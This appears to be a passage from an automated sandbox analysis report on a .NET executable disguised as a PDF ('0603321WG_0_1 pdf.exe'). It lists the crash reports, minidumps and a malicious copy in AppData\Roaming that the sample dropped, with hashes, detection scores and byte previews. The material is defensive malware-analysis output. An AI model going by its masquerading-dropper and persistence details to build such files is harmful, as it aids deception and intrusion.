                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.2.8.9.1.6.3.7.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.7.3.7.9.1.6.3.5.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.c.0.f.6.1.8.-.9.4.7.7.-.4.7.5.1.-.a.b.b.6.-.8.6.8.4.3.9.d.d.2.e.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.3.f.9.b.3.2.-.b.8.0.6.-.4.1.e.9.-.a.4.0.7.-.d.4.3.4.7.d.c.8.f.9.b.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.0.6.0.3.3.2.1.W.G._.0._.1. .p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.b.-.9.c.c.c.-.b.e.5.6.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.b.3.d.e.c.4.6.0.a.c.c.7.9.e.f.5.a.4.a.4.d.3.e.1.5.4.6.2.9.e.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.0.6.0.3.3.2.1.W.G._.0._.1. .p.d.
                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_55e97c2a76b36abd95c012613cbdc1e87e1be27_ecfa8783_1264366c\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15332
                                                      Entropy (8bit):3.7586859891010573
                                                      Encrypted:false
                                                      SSDEEP:192:8PLh/ht8CmPaKsUAeZiN/u7ssS274ItqyD:C/hGalmW/u7ssX4ItHD
                                                      MD5:479AF2C9DEE3833076BB790A4C3B559A
                                                      SHA1:FE3A2A8630CDE9246E679598815937EC827E330B
                                                      SHA-256:FECA214AD05C7AE82A06B94AF153C5E1F540E4A151E822C069AD64AA8C2FF81F
                                                      SHA-512:8E86BFE677B83B8D1A5625A49F6B4AD4879C45688C3214C419857F9F6F8E4E7CBC6818078227CDFCE2D33B52AFBAE074B6CE7606A70221A16C1346A701A596B9
                                                      Malicious:false
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.9.2.9.6.3.0.4.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.8.1.8.6.1.9.2.1.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.4.5.4.c.2.e.-.3.a.3.8.-.4.0.8.d.-.b.e.a.0.-.7.2.5.8.7.3.7.6.b.2.e.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.2.2.d.0.c.1.-.f.1.7.a.-.4.d.b.1.-.b.0.9.5.-.0.0.2.5.f.9.a.a.f.5.e.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.6.c.-.0.0.0.1.-.0.0.1.b.-.d.0.2.7.-.e.5.7.1.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.9.a.1.d.e.b.e.b.b.c.5.6.6.d.1.8.6.1.c.c.b.2.8.b.f.4.9.e.d.b.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_55e97c2a76b36abd95c012613cbdc1e87e1be27_ecfa8783_12fc5abd\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15932
                                                      Entropy (8bit):3.7632663178108876
                                                      Encrypted:false
                                                      SSDEEP:192:jEvV/7t8CmHBUZMXCaPceny+f//u7ssS274Itqyv:IN/7ABUZMXCaZ1X/u7ssX4ItHv
                                                      MD5:496BFFA99BF267B2431EC0E72BDEBBE3
                                                      SHA1:6A5B0AA512A7832BB8A21786FE8F61E29FE9E128
                                                      SHA-256:20BA1F70F2C853372F3EFC972DCB3148F75F446797D67559E61E20A1656B2053
                                                      SHA-512:E2A6A35D5AAD51482B24EE2BB67724E6A4FA3A5D0E9DFEFBFF1297E6965C87BE807AF8313C0391ADBA6BF73967BEC03C5E2F070CC20EAEB36E70DC177BCF0DD2
                                                      Malicious:false
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.2.7.9.2.2.2.8.6.7.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.2.8.1.6.6.8.1.7.3.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.2.d.c.9.b.b.-.b.0.4.c.-.4.1.c.f.-.a.b.8.1.-.b.8.b.8.0.0.e.5.9.c.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.d.6.d.b.4.0.-.6.7.4.f.-.4.0.a.8.-.b.2.0.a.-.7.e.f.3.0.3.1.c.e.3.a.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.b.-.0.b.a.3.-.0.6.7.7.b.e.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.b.9.a.1.d.e.b.e.b.b.c.5.6.6.d.1.8.6.1.c.c.b.2.8.b.f.4.9.e.d.b.0.0.0.0.0.9.0.4.!.0.0.0.0.1.c.b.4.6.5.d.a.f.8.e.6.a.2.0.2.3.5.6.d.b.8.6.a.9.3.8.0.e.9.4.e.6.c.c.1.f.a.4.d.!.N.e.w.A.p.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8DD.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:33:19 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):194382
                                                      Entropy (8bit):4.4399707215637365
                                                      Encrypted:false
                                                      SSDEEP:3072:f3lYJ0sjd+pGchmAezow9gIOgF5xD0jhx+LUCgU5SYuBvZ:N00dpGX79RpDxDw8TjVOx
                                                      MD5:417F92F2BF27F0072C89729DCCDB4384
                                                      SHA1:117AB394D5281C39BEA1D0DDB9D1AE37A283BFB3
                                                      SHA-256:E99DA130C6DB298931886AF45AFF58F7F2D04771A0D893DED047C07EBBD6D0B6
                                                      SHA-512:0DB8FEE3296F28DB3F2B56F15BC198383B69BC30158772B7EF30872BE0C8EAD74F909E3FF1567CF45D4370F3C9C3BDB25FFA80AB3F00B616DEF705BDC8FC7F45
                                                      Malicious:false
                                                      Preview: MDMP....... ........4`...................U...........B......D)......GenuineIntelW...........T.............4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBBC.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:33:20 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):194782
                                                      Entropy (8bit):4.482260199726339
                                                      Encrypted:false
                                                      SSDEEP:3072:M6t+TfW0cVjd+pfA168OC/joF9gIOgF53e04DUCgU9ht:Tn0cqpCZo9RpD3eNDTjh
                                                      MD5:24DAD6D5E162C57A23EB35FCE308D105
                                                      SHA1:A88AC3AFA2E6B16174EB7BC97BCB26E08008FF43
                                                      SHA-256:77DDF2E2E353E18C3385FEC5341886750769F215B63A188E6A41407BBF1D37D8
                                                      SHA-512:46250D3872B9B4587AE30708F507E1D58377954C25D22FB891728BDB35902C5D004E0E1F7A963EFF38B120346A85C16CD21F174123BE8141FCD19648E60E149E
                                                      Malicious:false
                                                      Preview: MDMP....... ........4`...................U...........B.......)......GenuineIntelW...........T.......l.....4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD18D.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:32:13 2021, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):13720
                                                      Entropy (8bit):3.070412399223422
                                                      Encrypted:false
                                                      SSDEEP:96:5rQ8+GYp9TLk8lilfwJUZJhUUd1CsBayOkMleik3Vi0+FToSowMlkTKM9vuRmby:W8i0fIUEE1CsBayOkvZDxlcqYy
                                                      MD5:CF2A96D11AC4F1BDE401B42F863E15B6
                                                      SHA1:4C9B19905C24D028694ECE424103A38DCA35AB1C
                                                      SHA-256:B0566A478D0DAF555C71CE14103D440EA85467FD1305AEB62002EA20408437A8
                                                      SHA-512:BA8A58F18EF9A1CDBBB907C1BD7C6267ACE8063F6F4EAB4A5A174880CC5B2D33B400773A97C762656DA393D8ADFD39048AD4C062AC1DA5E09ABF037217BB1DEE
                                                      Malicious:false
                                                      Preview: MDMP....... .........4`...................U...........B.......)......GenuineIntelW...........T.......\...y.4`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3ED.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):7984
                                                      Entropy (8bit):3.6924550921072723
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNilLR6Db6Yr6SU3NgmfZjDM0Sz9+pr189bUKsfAcm:RrlsNi/6f6Y2SU3NgmfbSzLUpfK
                                                      MD5:70143ACCD961F32D9CF079B4A90385B2
                                                      SHA1:5C48E93C265A0A5157A5097381CF79E40FA34470
                                                      SHA-256:98C6213AAA43425271A1CBFEBB0FF31CA8F9EBC68F44436C0E468A165C52AF77
                                                      SHA-512:EE70CAE77848CB86182F9F4BFE5052C3EA23585408AE91183818950F69F92AB548CC0A8F75A69A822C2F38F51C840A6F5886BE4CE3BA7C4032244A5E5E52EDDB
                                                      Malicious:false
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7A7.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4723
                                                      Entropy (8bit):4.475785460676651
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsRtJgtWI9wWWSC8Bk8fm8M4JGFFYj+q8v+yVMELwbd:uITfRHv3SNbJJKfVMELwbd
                                                      MD5:5403042C0FA68A40D44287EE35CCC8F3
                                                      SHA1:0B2F43EF3DA9C3AB35D287460737010FE11613CB
                                                      SHA-256:39A6C3FF1D175ECB94BDE8D416A1FB692F64BA82454583294E8D51AFF695814D
                                                      SHA-512:F0B70955597707A933E53485D5EE273A66AA363C4458A2B72115AF689059582ADD465B7DBC4DDB86EB262F66E8D41B704D9094A67E202E8F42A38C37467C5145
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873702" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA12.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6943474843351978
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi4p6QHF6YruSUhAWgmfZqM0Si9+prs89bb3sfHVpm:RrlsNi+6Q6YySUhAWgmfeSiAb8fHy
                                                      MD5:99AF9A5B916494A08C513CC4D713995D
                                                      SHA1:85DD797033D350CC98E4F83DD70A9193197EC8CD
                                                      SHA-256:E4A593F968A1752FF5BF66598BB5159C3BFE845D8F1781422BE14F5E64D50D98
                                                      SHA-512:F568152A73527C2CDD67030AB9B19035C24B86683F5D4358B141F84AF33478CA671E69AAB42A42C66E8558E62C96D703B8D503CCE6657FDFEFFFACC60181DB30
                                                      Malicious:false
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEE5.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):7998
                                                      Entropy (8bit):3.6941669740699177
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi8C6bGe6YrNSUhAWgmfZqM0Sz9+pru89bgHsfsoAm:RrlsNih6z6YRSUhAWgmfeSz+gMfb
                                                      MD5:F68AE6BDC9F67D23E10C5DECA86E9674
                                                      SHA1:FDDF865EF0B20B9EE7DD36240177CEA0F0454F88
                                                      SHA-256:8EE20E035E1EED40A297F53E12ACA9BF56658BD48E31D4D882857B6FAF758214
                                                      SHA-512:3EA5651B1233489C0813A510E12425DEC0D910FA5C07F75712D308FD2F73A9408E343BEF56EBEEDDF052BF3C0EC43C9D6394B0F7D0709D56BE392C76AED42697
                                                      Malicious:false
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.7.2.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF176.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4668
                                                      Entropy (8bit):4.44887533423625
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsFJgtWI9wWWSC8Brf8fm8M4JGFF7t+q8vPtlCJL9Jd:uITffv3SNqJQKVlCJL9Jd
                                                      MD5:4A6FEB2544B18536223AE619EC866987
                                                      SHA1:9DCE0C120FC0CD26602AB5A77618382168E4CF73
                                                      SHA-256:B84C83D06E691B226920BA9CD3A24377D4545576C761D29200EE479C3E14BBA3
                                                      SHA-512:57C4C3CFB12F5190526AA797084829872571E5B964016965A08FA7AC36AD7F967A59763BCFD43A93446A0046B650D2087FCC34EF2D335A5AF71F27F094D4B2A9
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA9E.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4668
                                                      Entropy (8bit):4.449699963602759
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsFJgtWI9wWWSC8B88fm8M4JGFFM+q8vPBlCJL9VTd:uITffv3SNLJ9KZlCJL9VTd
                                                      MD5:8CD215F7E8B442A213EDB37D7C92D3A0
                                                      SHA1:7973FDA7C8FF34D1C544B35D61D22B2D1026030E
                                                      SHA-256:ACCFD4824E99529B8ABB6707E821E528A9B344F86D9678743E5A87312F22111E
                                                      SHA-512:324540B00EBF02D4886AADF4AFA89B10FC888D9B08167A4C0157CF73C1BD825FE266305C97457EC422AA6893BB7570B7342BAD24791D2FEBABAD50EC9D8784DF
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Process:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):30816
                                                      Entropy (8bit):6.915219173799537
                                                      Encrypted:false
                                                      SSDEEP:384:ghiAhOVUOxO7CX5KGSKtWf0gl1QSrKHkvN9Abr8kIKFrq1ASLHqVnWA5ju61vkhG:kfhQ7bX0tKtWfIg9AniKFRnWA5nChG
                                                      MD5:9844048A2B7081D223139F100B0FF486
                                                      SHA1:1CB465DAF8E6A202356DB86A9380E94E6CC1FA4D
                                                      SHA-256:283915D333318F5E8E7F30CDF8F8F96723DA7AF6DDAB9C29C6F0B5A687157AA4
                                                      SHA-512:7C1C66C45E3B375D3E3819739BF32EE89FB1A7BC3623273CFD65109412CA3DDE0907EC789CF331A1653F2857377E698073E02C03E3F009DB67525C7862125DA3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 22%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..Z...........x... ........@.. ..............................k.....@..................................x..O....................b..`............................................................ ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............`..............@..B.................x......H........'...Q...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0............(......(......(.....s......(......~....o..........%.r...pr...p~-...o!...(.....o.......+F+...&.........o...........,%..(......(......(.......(.....o.........X....i2..(...........%..o.......+...*..0...........s.....*.0..M..............%.r...pri..p~-...o!....%.rm..pr...p~-...o!.....s.....+...'.....o.....*....0............(.....r...pr..
                                                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier
                                                      Process:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):6.915219173799537
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:0603321WG_0_1 pdf.exe
                                                      File size:30816
                                                      MD5:9844048a2b7081d223139f100b0ff486
                                                      SHA1:1cb465daf8e6a202356db86a9380e94e6cc1fa4d
                                                      SHA256:283915d333318f5e8e7f30cdf8f8f96723da7af6ddab9c29c6f0b5a687157aa4
